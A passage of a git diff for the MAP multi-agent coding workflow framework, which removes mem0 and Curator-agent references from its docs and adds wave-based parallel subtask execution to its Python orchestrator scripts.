knowledge -- Validated patterns used across branches -- Standard access - -**L3 (Org-scoped)** -- Cross-project patterns -- Organizational best practices -- Broadest scope - -Search flows: L1 → L2 → L3 (most specific first) - --- ## Resources & Deep Dives @@ -496,10 +462,8 @@ MAP: 📚 Loads this skill for context 1. **Default to /map-efficient** — It's the recommended choice for 80% of tasks 2. **Use /map-fast sparingly** — Only for small, low-risk changes with clear scope 3. **Use /map-efficient for critical paths** — Describe risk context in the task description for appropriate Predictor triggers -4. **Monitor pattern growth** — Use mem0 search to see learning improving -5. **Trust the optimization** — /map-efficient preserves quality while cutting token usage -6. **Review deep dives** — When in doubt, check the appropriate deep-dive resource -7. **Leverage mem0 patterns** — Stored patterns from previous tasks via tiered search +4. **Trust the optimization** — /map-efficient preserves quality while cutting token usage +5. **Review deep dives** — When in doubt, check the appropriate deep-dive resource --- @@ -555,7 +519,6 @@ MAP: 📚 Loads this skill for context | Wrong workflow chosen mid-task | Cannot switch workflows during execution | Complete current workflow, then restart with correct one | | Predictor never runs in /map-efficient | Subtasks assessed as low-risk | Expected behavior; Predictor is conditional. 
Use /map-debug for guaranteed analysis | | No patterns stored after /map-fast | /map-fast skips learning agents | By design — use /map-efficient + /map-learn for pattern accumulation | -| mem0 search returns empty | mem0 MCP not configured or namespaces mismatch | Verify mem0 in `.claude/mcp_config.json`, check namespace conventions | | Skill suggests wrong workflow | Description trigger mismatch | Check skill-rules.json triggers; refine query wording | --- diff --git a/.claude/skills/map-workflows-guide/resources/agent-architecture.md b/.claude/skills/map-workflows-guide/resources/agent-architecture.md index d4a8d25..1b8b212 100644 --- a/.claude/skills/map-workflows-guide/resources/agent-architecture.md +++ b/.claude/skills/map-workflows-guide/resources/agent-architecture.md @@ -1,6 +1,6 @@ # Agent Architecture -MAP Framework orchestrates 12 specialized agents in a coordinated workflow. +MAP Framework orchestrates 11 specialized agents in a coordinated workflow. ## Agent Categories @@ -14,7 +14,7 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. **2. Actor** - **Role:** Implements code changes -- **Input:** Subtask description, acceptance criteria, mem0 pattern context +- **Input:** Subtask description, acceptance criteria - **Output:** Code changes, rationale, test strategy - **When it runs:** For each subtask (multiple times if revisions needed) @@ -53,16 +53,6 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. - **When it runs:** - /map-efficient, /map-debug, /map-debate: Batched (once at end, via /map-learn) - /map-fast: Never (skipped) -- **MCP Tool:** Uses `mcp__mem0__map_tiered_search` to check for existing patterns - -**7. 
Curator** -- **Role:** Updates memory with validated patterns -- **Input:** Reflector insights -- **Output:** Delta operations (ADD/UPDATE/ARCHIVE patterns) -- **When it runs:** After Reflector -- **MCP Tools:** - - `mcp__mem0__map_tiered_search` to deduplicate - - `mcp__mem0__map_add_pattern` to store new patterns ### Optional @@ -121,7 +111,7 @@ TaskDecomposer ↓ Final-Verifier (adversarial verification of entire goal) ↓ - Done! Optional: /map-learn → Reflector → Curator + Done! Optional: /map-learn → Reflector ``` ### Multi-Variant Pipeline (map-debate) @@ -135,7 +125,7 @@ TaskDecomposer Monitor → [Predictor if high risk] → Apply changes ↓ Batch learning (via /map-learn): - Reflector (all subtasks) → Curator → Done + Reflector (all subtasks) → Done ``` --- @@ -193,7 +183,6 @@ Otherwise: Skipped (token savings) ### Workflow State - All subtask results - Aggregated patterns (Reflector) -- mem0 delta operations (Curator) --- @@ -223,8 +212,8 @@ Agents communicate via structured JSON: - Actor iterates (max 3-5 attempts) - If still failing: Mark subtask as failed, continue with others -### MCP Tool Failures -- Reflector/Curator gracefully degrade +### Learning Failures +- Reflector gracefully degrades - Learning skipped but implementation continues - Logged to stderr for debugging @@ -242,7 +231,6 @@ Agents communicate via structured JSON: | Evaluator | ~0.8K | Per subtask | map-debug, map-review | | Predictor | ~1.5K | Per subtask or conditional | Varies | | Reflector | ~2K | Per subtask or batched | Varies | -| Curator | ~1.5K | After Reflector | Varies | | Debate-Arbiter | ~3-4K | Per subtask | map-debate only | | Synthesizer | ~2K | Per subtask | map-efficient (--self-moa) | | Research-Agent | ~2-3K | Once (before Actor) | map-plan, map-efficient, map-debug | @@ -251,7 +239,7 @@ Agents communicate via structured JSON: **map-efficient savings:** - Skip Evaluator: ~0.8K per subtask - Conditional Predictor: ~1.5K per low-risk subtask -- Batch Reflector/Curator: 
~(N-1) × 3.5K for N subtasks +- Batch Reflector: ~(N-1) × 2K for N subtasks --- diff --git a/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md index 37e5aab..959e188 100644 --- a/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md @@ -39,7 +39,7 @@ - How was it fixed? - How to prevent similar bugs? -4. Curator documents: + Reflector also documents: - Debugging techniques used - Common pitfalls - Prevention strategies @@ -152,9 +152,6 @@ Reflector: ├─ Solution: "Use mutex for critical sections" └─ Prevention: "Design for immutability" -Curator: -├─ ADD "debug-0042: Async race condition patterns" -└─ ADD "impl-0099: Use immutable state updates" ``` --- @@ -221,7 +218,7 @@ Root cause: Improper async error handling 2. What test was missing? 3. What pattern should we follow? -**Curator documents:** +**Reflector documents:** ```json { "type": "TESTING_STRATEGY", diff --git a/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md index 1e69fbf..6a2afb0 100644 --- a/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md @@ -34,15 +34,15 @@ Subtask 3: Add unit tests (tests/auth.test.ts) → Predictor: ⏭️ SKIPPED (test file, no side effects) ``` -### Reflector/Curator: Batched Learning +### Reflector: Batched Learning **Full pipeline (theoretical baseline):** ``` -Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator -Subtask 3 → Actor → Monitor → Predictor → Evaluator → Reflector → Curator +Subtask 1 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 2 → Actor → Monitor → Predictor → Evaluator → Reflector +Subtask 
3 → Actor → Monitor → Predictor → Evaluator → Reflector ``` -Result: 3 × (Predictor + Evaluator + Reflector + Curator) cycles +Result: 3 × (Predictor + Evaluator + Reflector) cycles **Optimized workflow (/map-efficient):** ``` @@ -53,9 +53,9 @@ Subtask 3 → Actor → Monitor → [Predictor if high risk] → Apply Final-Verifier (adversarial verification) ↓ Done! Optionally run /map-learn: - Reflector (analyzes ALL subtasks) → Curator (consolidates patterns) + Reflector (analyzes ALL subtasks, consolidates patterns) ``` -Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /map-learn. +Result: No Evaluator, no per-subtask Reflector. Learning decoupled to /map-learn. **Token savings:** 35-40% vs full pipeline @@ -91,7 +91,7 @@ Result: No Evaluator, no per-subtask Reflector/Curator. Learning decoupled to /m **What's optimized (intentionally omitted per-subtask):** - Evaluator — Monitor validates correctness directly -- Reflector/Curator — decoupled to /map-learn (optional, run after workflow) +- Reflector — decoupled to /map-learn (optional, run after workflow) --- @@ -139,13 +139,9 @@ Final-Verifier: ✅ All subtasks verified, goal achieved Optional /map-learn: Reflector (batched): ├─ Analyzed: 3 subtasks - ├─ Searched mem0: Found similar pagination patterns - └─ Extracted: pagination pattern, API versioning, test structure - - Curator (batched): - ├─ Checked duplicates: 2 similar bullets found - ├─ Added: 1 new bullet (API pagination pattern) - └─ Updated: 1 existing bullet (test coverage++) + ├─ Found similar pagination patterns + ├─ Extracted: pagination pattern, API versioning, test structure + └─ Consolidated: 1 new pattern (API pagination), 1 updated (test coverage++) ``` **Token usage:** @@ -192,7 +188,7 @@ BATCH_SIZE = None # or 5 for large tasks **Fix:** Review `subtask.modifies_critical_files()` logic **Issue:** Learning not happening -**Cause:** Reflector/Curator not running +**Cause:** Reflector not running **Fix:** Check workflow 
completion (must finish all subtasks) **Issue:** Token usage higher than expected diff --git a/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md index 08161fe..dce9fc9 100644 --- a/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-fast-deep-dive.md @@ -45,11 +45,6 @@ - Failures not documented - Knowledge not extracted -**Curator (mem0 Pattern Updates)** -- No mem0 patterns created -- No pattern synchronization -- No cross-project learning - ### What Remains **Actor + Monitor:** @@ -70,7 +65,6 @@ | Evaluator | ~0.8K | ❌ Skipped | | Predictor | ~1.5K | ❌ Skipped | | Reflector | ~2K | ❌ Skipped | -| Curator | ~1.5K | ❌ Skipped | **Total saved:** ~5.8K per subtask **Percentage:** 40-50% vs full pipeline @@ -96,7 +90,7 @@ ST-1: Setup React Query client Actor → Monitor → Apply ST-2: Test with one API endpoint Actor → Monitor → Apply -Done. No Evaluator, no Reflector, no Curator, no patterns learned. +Done. No Evaluator, no Reflector, no patterns learned. ``` **Appropriate because:** @@ -121,7 +115,7 @@ Risk: High (security, breaking changes) **Problems with using map-fast:** 1. No Predictor → Breaking changes undetected 2. No Reflector → Security patterns not learned -3. No Curator → Team doesn't learn from mistakes +3. No learning → Team doesn't learn from mistakes 4. High risk for under-validation mindset **Correct choice:** `/map-efficient` (critical infrastructure) diff --git a/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md index d0a2f80..9b84fdf 100644 --- a/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-feature-deep-dive.md @@ -34,14 +34,13 @@ For each subtask: 4. Evaluator scores quality 5. If approved: 5a. 
Reflector extracts patterns - 5b. Curator stores patterns in mem0 - 5c. Apply changes + 5b. Apply changes 6. If not approved: Return to Actor ``` **Key difference from /map-efficient:** - Predictor runs EVERY subtask (not conditional) -- Reflector/Curator run AFTER EVERY subtask (not batched) +- Reflector runs AFTER EVERY subtask (not batched) --- @@ -54,11 +53,10 @@ For each subtask: Subtask 1: Implement JWT generation ↓ completed Reflector: "JWT secret storage pattern" -Curator: Add pattern "impl-0099: Store secrets in env vars" - ↓ mem0 updated + ↓ pattern extracted Subtask 2: Implement JWT validation ↓ starts -Actor queries mem0: Finds "impl-0099" +Actor uses learned pattern ↓ applies pattern Uses env vars (learned from Subtask 1) ``` @@ -70,10 +68,10 @@ Uses env vars (learned from Subtask 1) **Per-subtask (/map-feature):** - ✅ Immediate pattern application - ✅ Error correction within workflow -- ❌ Higher token cost (N × Reflector/Curator) +- ❌ Higher token cost (N × Reflector) **Batched (/map-efficient):** -- ✅ Lower token cost (1 × Reflector/Curator) +- ✅ Lower token cost (1 × Reflector) - ⚠️ Patterns applied in next workflow - ✅ Holistic insights (sees all subtasks together) @@ -109,19 +107,16 @@ ST-1: OAuth2 provider config ├─ Predictor: ✅ RAN (security-sensitive) │ └─ Impact: Config must not be committed ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "Store OAuth secrets in env" -└─ Curator: ADD "sec-0042: OAuth secrets in .env" +└─ Reflector: Pattern "Store OAuth secrets in env" ST-2: Authorization code flow ├─ Actor: Implement auth/oauth.ts -│ └─ Queries mem0: Finds "sec-0042" │ └─ Uses .env for secrets (learned from ST-1!) 
├─ Monitor: ✅ Valid ├─ Predictor: ✅ RAN (affects auth flow) │ └─ Impact: All protected routes need update ├─ Evaluator: ✅ Approved (score: 9/10) -├─ Reflector: Pattern "PKCE for public clients" -└─ Curator: ADD "sec-0043: Use PKCE extension" +└─ Reflector: Pattern "PKCE for public clients" [ST-3, ST-4, ST-5 continue with same pattern] ``` @@ -209,7 +204,7 @@ ST-2: Authorization code flow - ✅ No security vulnerabilities **Knowledge captured:** -- ✅ mem0 patterns created (N subtasks → N+ patterns) +- ✅ Patterns extracted (N subtasks → N+ patterns) - ✅ Team can apply patterns immediately **Impact understood:** @@ -225,9 +220,9 @@ ST-2: Authorization code flow **Cause:** Per-subtask learning overhead **Solution:** Consider /map-efficient for next similar task -**Issue:** Too many mem0 patterns created +**Issue:** Too many patterns created **Cause:** Reflector suggesting redundant patterns -**Solution:** Curator should check for duplicates more aggressively +**Solution:** Review and deduplicate patterns more aggressively **Issue:** Predictor always says "high risk" **Cause:** Overly conservative risk assessment @@ -238,4 +233,3 @@ ST-2: Authorization code flow **See also:** - [map-efficient-deep-dive.md](map-efficient-deep-dive.md) - Optimized alternative - [agent-architecture.md](agent-architecture.md) - Understanding all agents -- [mem0 tiered search](../../map-cli-reference/SKILL.md) - How knowledge is stored and retrieved diff --git a/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md index 2faed47..8865244 100644 --- a/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-refactor-deep-dive.md @@ -53,8 +53,6 @@ Refactoring = Changing structure WITHOUT changing behavior - What patterns emerged? - What dependencies were discovered? - What risks were mitigated? - -4. 
Curator documents: - Refactoring techniques - Dependency patterns - Migration strategies @@ -203,9 +201,6 @@ Reflector: ├─ Pattern: "Use dependency injection for services" └─ Technique: "Incremental refactoring (6 safe steps)" -Curator: -├─ ADD "arch-0042: Controller-Service pattern" -└─ ADD "refactor-0099: Incremental extraction technique" ``` **Token usage:** ~9K tokens (6 subtasks, Predictor always runs) diff --git a/.claude/skills/skill-rules.json b/.claude/skills/skill-rules.json index 20aac1d..6212eeb 100644 --- a/.claude/skills/skill-rules.json +++ b/.claude/skills/skill-rules.json @@ -52,23 +52,22 @@ "type": "domain", "enforcement": "suggest", "priority": "high", - "description": "CLI and MCP error corrections", + "description": "CLI error corrections", "promptTriggers": { "keywords": [ "mapify command", "mapify error", "no such command", "no such option", - "mem0 mcp", "validate graph", "mapify init", "mapify check" ], "intentPatterns": [ - "(mapify|mem0).*(error|command|help|usage)", + "mapify.*(error|command|help|usage)", "(no such).*(command|option)", "validate.*(graph|dependency)", - "(how to|how do).*(mapify|mem0)" + "(how to|how do).*mapify" ] } } diff --git a/.gitignore b/.gitignore index a9c15e7..7e4a88b 100644 --- a/.gitignore +++ b/.gitignore @@ -58,15 +58,6 @@ docs/claude-code-infrastructure-showcase docs/claude-code-subagents -# Curator temporary files -.claude/curator_delta_operations.json -.claude/curator_integration_report.json -.claude/curator_operations.json -.claude/*_integration_report.json -.claude/apply_*_deltas.py -.claude/insert_*_bullets.sql -curator_operations*.json -curator_final_report.json docs/claude-code-prompt-improver # macOS system files diff --git a/.map/scripts/map_orchestrator.py b/.map/scripts/map_orchestrator.py index 66db1e8..a67114b 100755 --- a/.map/scripts/map_orchestrator.py +++ b/.map/scripts/map_orchestrator.py @@ -14,7 +14,7 @@ ┌─────────────────────────────────────────────────────────────┐ │ map-efficient.md 
(~540 lines) │ │ ├─> 1. Call get_next_step() → returns step instruction │ - │ ├─> 2. Execute step (Actor/Monitor/mem0/etc) │ + │ ├─> 2. Execute step (Actor/Monitor/etc) │ │ ├─> 3. Call validate_step() → checks completion │ │ ├─> 4. If more steps: recurse with fresh context │ │ └─> 5. Else: complete workflow │ @@ -30,9 +30,9 @@ "subtask_index": 0, "subtask_sequence": ["ST-001", "ST-002", "ST-003"], "current_step_id": "2.1", - "current_step_phase": "MEM0_SEARCH", + "current_step_phase": "CONTEXT_SEARCH", "completed_steps": ["1.0_DECOMPOSE", "1.5_INIT_PLAN", "2.0_XML_PACKET"], - "pending_steps": ["2.1_MEM0_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] + "pending_steps": ["2.1_CONTEXT_SEARCH", "2.3_ACTOR", "2.4_MONITOR", ...] } STEP PHASES (16 total): @@ -42,7 +42,7 @@ 1.56 CHOOSE_MODE - Choose execution mode (step_by_step|batch) 1.6 INIT_STATE - Create workflow_state.json 2.0 XML_PACKET - Build AI-friendly subtask packet - 2.1 MEM0_SEARCH - Tiered memory search + 2.1 CONTEXT_SEARCH - Context search 2.2 RESEARCH - research-agent (conditional) 2.3 ACTOR - Actor agent implementation 2.4 MONITOR - Monitor validation @@ -107,7 +107,7 @@ "1.56": "CHOOSE_MODE", "1.6": "INIT_STATE", "2.0": "XML_PACKET", - "2.1": "MEM0_SEARCH", + "2.1": "CONTEXT_SEARCH", "2.2": "RESEARCH", "2.3": "ACTOR", "2.4": "MONITOR", @@ -144,9 +144,9 @@ # If always_required is False, evidence is only checked when the step # appears in pending_steps (i.e., it wasn't skipped). 
EVIDENCE_REQUIRED = { - "2.3": ("actor", True), # Always required - "2.4": ("monitor", True), # Always required - "2.6": ("predictor", False), # Only when 2.6 is in pending_steps + "2.3": ("actor", True), # Always required + "2.4": ("monitor", True), # Always required + "2.6": ("predictor", False), # Only when 2.6 is in pending_steps } @@ -167,6 +167,11 @@ class StepState: max_retries: int = 5 plan_approved: bool = False execution_mode: str = "batch" # batch|step_by_step + # Wave-based parallel execution fields + execution_waves: List[List[str]] = field(default_factory=list) + current_wave_index: int = 0 + subtask_phases: Dict[str, str] = field(default_factory=dict) + subtask_retry_counts: Dict[str, int] = field(default_factory=dict) def to_dict(self) -> dict: """Serialize to dictionary.""" @@ -184,6 +189,10 @@ def to_dict(self) -> dict: "max_retries": self.max_retries, "plan_approved": self.plan_approved, "execution_mode": self.execution_mode, + "execution_waves": self.execution_waves, + "current_wave_index": self.current_wave_index, + "subtask_phases": self.subtask_phases, + "subtask_retry_counts": self.subtask_retry_counts, } @classmethod @@ -203,6 +212,10 @@ def from_dict(cls, data: dict) -> "StepState": max_retries=data.get("max_retries", 5), plan_approved=data.get("plan_approved", False), execution_mode=data.get("execution_mode", "batch"), + execution_waves=data.get("execution_waves", []), + current_wave_index=data.get("current_wave_index", 0), + subtask_phases=data.get("subtask_phases", {}), + subtask_retry_counts=data.get("subtask_retry_counts", {}), ) @classmethod @@ -293,7 +306,7 @@ def get_step_instruction(step_id: str, state: StepState) -> str: "validation_criteria, and test_strategy." ), "2.1": ( - "Call mcp__mem0__map_tiered_search to retrieve relevant patterns. " + "Search for relevant patterns and context. " "Re-rank by relevance and pass top 3 to Actor." 
), "2.2": ( @@ -468,15 +481,11 @@ def validate_step(step_id: str, branch: str) -> Dict: } # Validate JSON structure try: - evidence_data = json.loads( - evidence_file.read_text(encoding="utf-8") - ) + evidence_data = json.loads(evidence_file.read_text(encoding="utf-8")) except (json.JSONDecodeError, OSError) as exc: return { "valid": False, - "message": ( - f"Evidence file {evidence_file} is not valid JSON: {exc}" - ), + "message": (f"Evidence file {evidence_file} is not valid JSON: {exc}"), } # Check required fields for required_field in ("phase", "subtask_id", "timestamp"): @@ -592,6 +601,255 @@ def set_execution_mode(mode: str, branch: str) -> Dict: return {"status": "success", "execution_mode": state.execution_mode} +def set_waves(branch: str, blueprint_path: Optional[str] = None) -> Dict: + """Compute execution waves from blueprint DAG and store in step_state.json. + + Reads the blueprint JSON, builds a DependencyGraph, computes topological + waves, and splits waves by file conflicts. Stores the result in + step_state.execution_waves. + + Args: + branch: Git branch name (sanitized) + blueprint_path: Path to blueprint JSON (default: .map//blueprint.json) + + Returns: + Dict with status and computed waves + """ + # Import here to avoid circular deps at module level + sys_path_added = False + try: + from mapify_cli.dependency_graph import DependencyGraph, SubtaskNode + except ImportError: + # When running as a standalone script inside .map/scripts/, + # dependency_graph.py is not on the path. Try a relative import + # from the repo root (two levels up from .map/scripts/). 
+ import importlib.util + + dg_candidates = [ + Path("src/mapify_cli/dependency_graph.py"), + Path(__file__).resolve().parents[3] / "src" / "mapify_cli" / "dependency_graph.py", + ] + loaded = False + for candidate in dg_candidates: + if candidate.exists(): + spec = importlib.util.spec_from_file_location("dependency_graph", candidate) + if spec and spec.loader: + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + DependencyGraph = mod.DependencyGraph # noqa: N806 + SubtaskNode = mod.SubtaskNode # noqa: N806 + loaded = True + break + if not loaded: + return { + "status": "error", + "message": "Cannot import dependency_graph module", + } + + if blueprint_path is None: + blueprint_path = f".map/{branch}/blueprint.json" + + bp_file = Path(blueprint_path) + if not bp_file.exists(): + return { + "status": "error", + "message": f"Blueprint not found: {blueprint_path}", + } + + try: + blueprint = json.loads(bp_file.read_text(encoding="utf-8")) + except (json.JSONDecodeError, OSError) as exc: + return {"status": "error", "message": f"Invalid blueprint: {exc}"} + + subtasks = blueprint.get("subtasks", []) + if not subtasks: + return {"status": "error", "message": "No subtasks in blueprint"} + + # Build graph + graph = DependencyGraph() + affected_files_map: Dict[str, set] = {} + for st in subtasks: + st_id = st.get("id", "") + deps = st.get("dependencies", []) + graph.add_node(SubtaskNode(id=st_id, dependencies=deps)) + files = st.get("affected_files", []) + affected_files_map[st_id] = set(files) if files else set() + + # Compute waves + raw_waves = graph.compute_waves() + if raw_waves is None: + return {"status": "error", "message": "Cycle detected in dependency graph"} + + # Split each wave by file conflicts + final_waves: List[List[str]] = [] + for wave in raw_waves: + sub_waves = graph.split_wave_by_file_conflicts(wave, affected_files_map) + final_waves.extend(sub_waves) + + # Store in state + state_file = Path(f".map/{branch}/step_state.json") 
+ state = StepState.load(state_file) + state.execution_waves = final_waves + state.current_wave_index = 0 + state.subtask_phases = {} + state.subtask_retry_counts = {} + state.save(state_file) + + return { + "status": "success", + "execution_waves": final_waves, + "wave_count": len(final_waves), + } + + +def get_wave_step(branch: str) -> Dict: + """Get the current wave's subtask batch and per-subtask phases. + + Returns JSON describing what to execute next in wave-based mode. + + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with mode (parallel|sequential), wave_index, subtasks, is_complete + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return { + "mode": "sequential", + "wave_index": 0, + "subtasks": [], + "is_complete": True, + "message": "No execution waves configured. Use sequential mode.", + } + + if state.current_wave_index >= len(state.execution_waves): + return { + "mode": "sequential", + "wave_index": state.current_wave_index, + "subtasks": [], + "is_complete": True, + } + + wave = state.execution_waves[state.current_wave_index] + mode = "sequential" if len(wave) == 1 else "parallel" + + # Build subtask info with current phases + subtask_infos = [] + for st_id in wave: + phase = state.subtask_phases.get(st_id, "2.3") + phase_name = STEP_PHASES.get(phase, "ACTOR") + subtask_infos.append({ + "subtask_id": st_id, + "phase": phase_name, + "step_id": phase, + }) + + return { + "mode": mode, + "wave_index": state.current_wave_index, + "wave_total": len(state.execution_waves), + "subtasks": subtask_infos, + "is_complete": False, + } + + +def validate_wave_step(subtask_id: str, step_id: str, branch: str) -> Dict: + """Validate one subtask's step within a wave and advance its phase. 
+ + Args: + subtask_id: Subtask ID (e.g., "ST-002") + step_id: Step ID completed (e.g., "2.3") + branch: Git branch name (sanitized) + + Returns: + Dict with validation result and next phase for this subtask + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + # Evidence-gated validation for actor/monitor steps + if step_id in EVIDENCE_REQUIRED: + phase_name, _always_required = EVIDENCE_REQUIRED[step_id] + evidence_dir = Path(f".map/{branch}/evidence") + if evidence_dir.is_dir(): + evidence_file = evidence_dir / f"{phase_name}_{subtask_id}.json" + if not evidence_file.exists(): + return { + "valid": False, + "message": ( + f"Evidence file missing: {evidence_file}. " + f"The {phase_name} agent must write this file." + ), + } + + # Determine next phase for this subtask + subtask_step_order = [s for s in STEP_ORDER if s.startswith("2.")] + current_idx = subtask_step_order.index(step_id) if step_id in subtask_step_order else -1 + + if current_idx >= 0 and current_idx + 1 < len(subtask_step_order): + next_phase = subtask_step_order[current_idx + 1] + else: + next_phase = "COMPLETE" + + state.subtask_phases[subtask_id] = next_phase + state.save(state_file) + + return { + "valid": True, + "message": f"Step {step_id} for {subtask_id} completed", + "next_phase": next_phase, + "subtask_id": subtask_id, + } + + +def advance_wave(branch: str) -> Dict: + """Advance to the next execution wave. + + Called when all subtasks in current wave have passed VERIFY_ADHERENCE. 
+ + Args: + branch: Git branch name (sanitized) + + Returns: + Dict with status and new wave index + """ + state_file = Path(f".map/{branch}/step_state.json") + state = StepState.load(state_file) + + if not state.execution_waves: + return {"status": "error", "message": "No execution waves configured"} + + state.current_wave_index += 1 + # Reset per-subtask phases for the new wave + state.subtask_phases = {} + state.subtask_retry_counts = {} + + is_complete = state.current_wave_index >= len(state.execution_waves) + + # Update subtask_index to track overall progress + if not is_complete: + next_wave = state.execution_waves[state.current_wave_index] + if next_wave: + state.current_subtask_id = next_wave[0] + # Find the index in subtask_sequence + if state.current_subtask_id in state.subtask_sequence: + state.subtask_index = state.subtask_sequence.index( + state.current_subtask_id + ) + + state.save(state_file) + + return { + "status": "success", + "current_wave_index": state.current_wave_index, + "is_complete": is_complete, + "wave_total": len(state.execution_waves), + } + + SKIPPABLE_STEPS = {"2.2", "2.6", "2.11"} @@ -801,6 +1059,10 @@ def main(): "set_subtasks", "resume_from_plan", "check_circuit_breaker", + "set_waves", + "get_wave_step", + "validate_wave_step", + "advance_wave", ], help="Command to execute", ) @@ -811,6 +1073,9 @@ def main(): "extra_args", nargs="*", help="Additional arguments (e.g., more subtask IDs)" ) parser.add_argument("--branch", help="Git branch (auto-detected if omitted)") + parser.add_argument( + "--blueprint", help="Path to blueprint JSON (for set_waves command)" + ) args = parser.parse_args() @@ -893,6 +1158,36 @@ def main(): result = check_circuit_breaker(branch) print(json.dumps(result, indent=2)) + elif args.command == "set_waves": + blueprint_path = args.blueprint or args.task_or_step # --blueprint or positional + result = set_waves(branch, blueprint_path) + print(json.dumps(result, indent=2)) + + elif args.command == 
"get_wave_step": + result = get_wave_step(branch) + print(json.dumps(result, indent=2)) + + elif args.command == "validate_wave_step": + if not args.task_or_step: + print( + json.dumps({"error": "subtask_id required for validate_wave_step"}), + file=sys.stderr, + ) + sys.exit(1) + extra = args.extra_args or [] + if not extra: + print( + json.dumps({"error": "step_id required as second argument"}), + file=sys.stderr, + ) + sys.exit(1) + result = validate_wave_step(args.task_or_step, extra[0], branch) + print(json.dumps(result, indent=2)) + + elif args.command == "advance_wave": + result = advance_wave(branch) + print(json.dumps(result, indent=2)) + except Exception as e: print(json.dumps({"error": str(e)}), file=sys.stderr) sys.exit(1) diff --git a/.map/scripts/map_step_runner.py b/.map/scripts/map_step_runner.py index 92e388e..ccae80b 100755 --- a/.map/scripts/map_step_runner.py +++ b/.map/scripts/map_step_runner.py @@ -116,6 +116,82 @@ def update_workflow_state( return {"status": "error", "message": str(e)} +def update_workflow_state_batch( + updates: List[Dict], + branch: Optional[str] = None, +) -> Dict: + """ + Update workflow_state.json for multiple subtasks in one call. + + Used in wave-based parallel execution to update all subtasks in a wave + after their actors/monitors complete. 
+ + Args: + updates: List of dicts, each with: + - subtask_id: Subtask ID (e.g., "ST-002") + - step_name: Step name (e.g., "actor", "monitor") + - new_state: New state (e.g., "ACTOR_CALLED", "MONITOR_PASSED") + branch: Git branch (auto-detected if None) + + Returns: + Dict with status and per-subtask results + """ + if branch is None: + branch = get_branch_name() + + state_file = Path(f".map/{branch}/workflow_state.json") + + if not state_file.exists(): + return {"status": "error", "message": "workflow_state.json not found"} + + try: + state = json.loads(state_file.read_text(encoding="utf-8")) + + if "completed_steps" not in state: + state["completed_steps"] = {} + + results = [] + active_subtasks = [] + + for update in updates: + subtask_id = update.get("subtask_id", "") + step_name = update.get("step_name", "") + new_state = update.get("new_state", "") + + if subtask_id not in state["completed_steps"]: + state["completed_steps"][subtask_id] = [] + + if step_name not in state["completed_steps"][subtask_id]: + state["completed_steps"][subtask_id].append(step_name) + + active_subtasks.append(subtask_id) + results.append({ + "subtask_id": subtask_id, + "step_name": step_name, + "new_state": new_state, + }) + + # Set active_subtasks list for wave mode (used by workflow-gate.py) + state["active_subtasks"] = active_subtasks + if active_subtasks: + state["current_subtask"] = active_subtasks[0] + state["current_state"] = updates[-1].get("new_state", "UPDATED") + + # Write back atomically + tmp_file = state_file.with_suffix(".tmp") + tmp_file.write_text(json.dumps(state, indent=2), encoding="utf-8") + tmp_file.replace(state_file) + + return { + "status": "success", + "message": f"Batch updated {len(updates)} subtasks", + "results": results, + } + + except (json.JSONDecodeError, OSError) as e: + return {"status": "error", "message": str(e)} + + def update_plan_status( subtask_id: str, new_status: str, @@ -342,7 +418,17 @@ def get_current_phase(branch: Optional[str] = None) 
-> Optional[str]: func_name = sys.argv[1] - if func_name == "update_workflow_state" and len(sys.argv) >= 5: + if func_name == "update_workflow_state_batch" and len(sys.argv) >= 3: + updates_json = sys.argv[2] + try: + updates = json.loads(updates_json) + except json.JSONDecodeError as e: + print(json.dumps({"status": "error", "message": f"Invalid JSON: {e}"})) + sys.exit(1) + result = update_workflow_state_batch(updates) + print(json.dumps(result, indent=2)) + + elif func_name == "update_workflow_state" and len(sys.argv) >= 5: result = update_workflow_state(sys.argv[2], sys.argv[3], sys.argv[4]) print(json.dumps(result, indent=2)) diff --git a/CLAUDE.md b/CLAUDE.md index d9f322c..9d3f6b6 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -37,7 +37,6 @@ Verification: ## Safety expectations - Don't add or expose secrets. Avoid reading/writing `.env*` and credential/key files. -- When changing pattern storage behavior, ensure Curator-mediated writes through mem0 MCP are preserved (see `.claude/agents/curator.md` and `docs/ARCHITECTURE.md`). 
